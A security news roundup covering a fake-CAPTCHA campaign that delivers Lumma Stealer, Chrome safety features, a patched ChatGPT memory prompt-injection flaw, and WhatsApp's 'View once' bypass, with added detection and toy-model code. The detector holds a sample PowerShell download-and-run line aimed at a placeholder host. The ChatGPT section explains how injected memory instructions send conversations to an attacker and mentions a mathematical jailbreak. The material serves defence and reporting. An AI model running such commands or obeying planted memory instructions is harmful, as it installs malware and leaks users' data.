Intel Wrap – September

October 7, 2024
Musa Nadir Sani

This month focuses on a campaign exploiting fake CAPTCHAs to deliver malware, new Google Chrome safety features, a recently patched vulnerability in OpenAI’s macOS software, and the WhatsApp ‘View Once’ vulnerability that allowed attackers to bypass the feature.

New Campaign Exploiting CAPTCHA to Deliver Malware

Cybersecurity experts are warning about a new cyberattack vector involving counterfeit CAPTCHA tests designed to distribute malware on Windows devices.

Summary

  • Traditional CAPTCHA tests are being subverted by cybercriminals to trick users into executing a series of commands that initiate malware installation.
  • These fake CAPTCHAs prompt users to press “Windows + R” (which opens the Run dialog), then “CTRL + V” and “Enter,” pasting and executing a PowerShell command that installs the Lumma Stealer malware.
  • Lumma Stealer is a type of information-stealing malware capable of exfiltrating sensitive data, including passwords, cookies, and cryptocurrency wallet credentials.
  • Researchers have observed widespread distribution of these malicious CAPTCHAs on compromised websites, which automatically copy the harmful script to the user’s clipboard.
  • Cybercriminals are refining this technique, and these attacks are often deployed through phishing emails and messages, making them particularly dangerous.
  • To mitigate this threat, users should be cautious with CAPTCHA tests that require unusual actions, verify URLs, keep systems updated, and avoid interacting with unsolicited emails or messages.
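
As an added illustration (not from the original post or from the researchers it cites), the detection logic below flags the process pattern this flow produces on an endpoint: PowerShell spawned by explorer.exe (the Run dialog) with download-and-execute arguments pasted from the clipboard. The event records are constructed samples in Sysmon Event ID 1 style and the URL is a placeholder.

```python
import re

# Constructed sample process-creation records (Sysmon Event ID 1 style), not
# real telemetry. The first record mimics the fake-CAPTCHA flow: the Run dialog
# (hosted by explorer.exe) launches PowerShell with a pasted one-liner that
# downloads and runs a remote script. The other two are benign lookalikes.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://placeholder.invalid/x | iex"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Admin\deploy.exe",
     "CommandLine": "powershell -File C:\\scripts\\backup.ps1"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

# Hallmarks of a pasted download-and-execute command line.
SUSPICIOUS = re.compile(
    r"(?i)(\biex\b|invoke-expression|\biwr\b|invoke-webrequest|downloadstring|"
    r"-enc\w*\s|frombase64string|-w(indowstyle)?\s+hidden|https?://)"
)

def is_shell(image: str) -> bool:
    """True for interpreters commonly launched from the Run dialog by this lure."""
    name = image.rsplit("\\", 1)[-1].lower()
    return name in {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

def from_run_dialog(event: dict) -> bool:
    """The Run dialog lives in explorer.exe, so the child's parent is explorer."""
    return event["ParentImage"].rsplit("\\", 1)[-1].lower() == "explorer.exe"

def score_event(event: dict) -> int:
    """0 = benign, 1 = shell launched from Run dialog (review), 2 = likely ClickFix-style paste."""
    if not is_shell(event["Image"]) or not from_run_dialog(event):
        return 0
    return 2 if SUSPICIOUS.search(event["CommandLine"]) else 1

def find_suspicious(events) -> list:
    """Command lines of events that match the full fake-CAPTCHA pattern."""
    return [e["CommandLine"] for e in events if score_event(e) == 2]

if __name__ == "__main__":
    for line in find_suspicious(SAMPLE_EVENTS):
        print("ALERT:", line)
```

In a real deployment the same logic maps onto a SIEM rule on process-creation telemetry; the RunMRU registry key also records what was typed into the Run dialog and is worth collecting during triage.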

Google rolls out new security features for its Chrome Browser

Google has introduced new features in Chrome to provide users with greater control over their data and enhance protection against online threats.

Summary

  • The upgraded Safety Check now runs automatically in the background, revoking permissions for sites no longer visited and flagging potentially unwanted notifications.
  • Safety Check will also alert users about security issues that need attention and automatically revoke notification permissions from suspicious sites detected by Google Safe Browsing.
  • For desktop users, Safety Check can identify Chrome extensions that pose security risks and offer quick controls to remove them.
  • Safety Check can warn users if their stored usernames or passwords have been involved in a data breach, prompting them to update their credentials.
  • New updates also enable users to unsubscribe from unwanted website notifications directly from the notifications drawer on Pixel and Android devices.
  • Chrome now allows users to grant one-time permissions for camera or microphone access, enhancing privacy by revoking these permissions once the user leaves the site.

ChatGPT macOS app vulnerability patched to mitigate potential spyware activity

A security vulnerability in OpenAI’s ChatGPT app for macOS, now patched, could have allowed attackers to implant persistent spyware in the tool’s memory, a technique termed “SpAIware.”

Summary

  • The exploit leveraged ChatGPT’s memory feature, which allows the AI to remember information across sessions, enabling attackers to perform continuous data exfiltration of user inputs and ChatGPT responses.
  • By manipulating ChatGPT’s memory through indirect prompt injections, attackers could embed malicious instructions that persist across all future chat sessions.
  • A hypothetical attack could involve a user being tricked into visiting a malicious site or opening a booby-trapped document, which then modifies ChatGPT’s memory to send future conversation data to an attacker-controlled server.
  • The issue was addressed by OpenAI in ChatGPT version 1.2024.247, closing the data exfiltration vector and preventing such attacks.
  • Users are advised to regularly review and delete suspicious or incorrect memories stored in ChatGPT to prevent misuse or malicious persistence.
  • Separately, researchers have discovered a new AI jailbreaking technique called “MathPrompt” that uses symbolic mathematics to bypass LLM safety mechanisms, showing a 73.6% success rate in generating harmful output compared to 1% with direct harmful prompts.

Meta fixes WhatsApp ‘View Once’ vulnerability

A privacy flaw in WhatsApp’s “View once” feature allowed attackers to bypass restrictions and view messages multiple times, compromising users’ privacy.

Summary

  • The “View once” feature, introduced three years ago, enables users to share photos, videos, and voice messages that disappear after being opened once and prevents forwarding, sharing, or taking screenshots.
  • However, the feature only blocks screenshots on mobile devices; the desktop and web versions do not support this restriction, leaving those clients unprotected.
  • A research team discovered that the implementation of the “View once” feature allowed attackers to bypass its protections by modifying the “View once” flag, enabling them to download, forward, and share the messages.
  • The flaw persisted because the encrypted “View once” messages were sent to all of the recipient’s devices and stored on WhatsApp servers even after being viewed, giving users a false sense of privacy.
  • Meta is currently rolling out changes to fix this issue on WhatsApp Web but has not confirmed if custom WhatsApp apps remain exploitable.
  • The vulnerability has been abused for at least a year, with browser extensions released to disable the “View once” flag, leading researchers to call for a thorough fix or for the feature to be abandoned because it gives users a false sense of privacy.
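
To make the design point concrete, here is an added toy model (not WhatsApp’s code, and the hardened variant is an assumed design rather than Meta’s actual fix). The flawed relay stores a view-once message for every linked device and keeps serving it after it has been viewed, so only the receiving client’s respect for the flag limits access; the enforcing relay tracks consumption server-side and purges the message, so the flag in the message is never what protects it.

```python
from dataclasses import dataclass

@dataclass
class Message:
    msg_id: str
    ciphertext: str   # stand-in for the encrypted media blob
    view_once: bool   # flag set by the sender's client

class FlawedRelay:
    """Flawed model: one stored copy per device, never consumed server-side.
    Any client that ignores or clears view_once can fetch the media again."""
    def __init__(self):
        self.store = {}

    def send(self, msg, recipient, devices):
        for dev in devices:
            self.store[(msg.msg_id, recipient, dev)] = msg

    def fetch(self, msg_id, recipient, device):
        return self.store.get((msg_id, recipient, device))  # served every time

class EnforcingRelay:
    """Hardened model (assumed design): the server hands a view-once message
    to a recipient account at most once, then deletes it, regardless of which
    linked device asks or what the client does with the flag."""
    def __init__(self):
        self.store = {}

    def send(self, msg, recipient, devices):
        self.store[(msg.msg_id, recipient)] = msg  # one copy per account

    def fetch(self, msg_id, recipient, device):
        key = (msg_id, recipient)
        msg = self.store.get(key)
        if msg is not None and msg.view_once:
            del self.store[key]  # consumed: later fetches from any device get None
        return msg

def view_count(relay_cls, view_once=True) -> int:
    """How many times recipient 'bob' can retrieve the same message across
    a phone, a linked web client, and the phone again (constructed scenario)."""
    relay = relay_cls()
    relay.send(Message("m1", "<ciphertext>", view_once), "bob", ["phone", "web"])
    return sum(relay.fetch("m1", "bob", dev) is not None
               for dev in ["phone", "web", "phone"])

if __name__ == "__main__":
    print("flawed:", view_count(FlawedRelay), "enforcing:", view_count(EnforcingRelay))
```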
